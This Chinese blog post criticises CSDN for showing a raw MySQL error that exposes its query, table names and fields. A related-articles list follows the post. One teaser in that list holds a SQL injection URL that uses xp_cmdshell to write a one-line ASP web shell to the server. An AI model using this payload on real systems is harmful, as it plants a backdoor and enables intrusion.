CSDN的数据出错直接抛出错误SQL文
今天在上CSDN空间的时候,数据库出错直接抛出SQL文了,消息如下:
MySQL Error
Message
: MySQL Query Error
SQL
: SELECT main.*, field.* from uchome_space main, uchome_spacefield field
WHERE field.sex='1' AND field.uid=main.uid
ORDER BY main.viewnum DESC LIMIT 0,100
Error
: Incorrect key file for table '/tmp/#sql_2a52_0.MYI'; try to repair it
Errno.
: 126
一般来说这种错误的消息是不让外部看的,就是catch后报一个系统错就好了。
如果上面的这个样子的话,即使不懂得人也知道我们的用的MySQL数据库。还有就是看到了表名和字段名,和检索逻辑。
在安全性上并不是值得提倡的。
相关文档:
作者:罗代均 ldj_work#126.com 转载请保持完整性
1.测试表
employee
雇员id 部门id 薪金
emp_id dept_id salary
......
1. 获取数据库中当前月份的相关数据
SELECT WorkerSortID, SUM(WorkerCount) AS WorkerMothCount
from WorkerRecord
WHERE (YEAR(WorkerTime) = YEAR({ fn NOW() })) AND (MONTH(WorkerTime)
= MONTH({ fn NOW() })) AND (WorkerCount > 0) AND (WorkerID = 'wy')
GROUP BY Worker ......
最详细的SQL注入语句相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:
http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';- ......
实现小数据量和海量数据的通用分页显示存储过程
建立一个 Web 应用,分页浏览功能必不可少。这个问题是数据库处理中十分常见的问题。经典的数据分页方法是:ADO 纪录集分页法,也就是利用ADO自带的分页功能(利用游标)来实现分页。但这种分页方法仅适用于较小数据量的情形,因为游标本身有缺点:游标是存放在内存中, ......
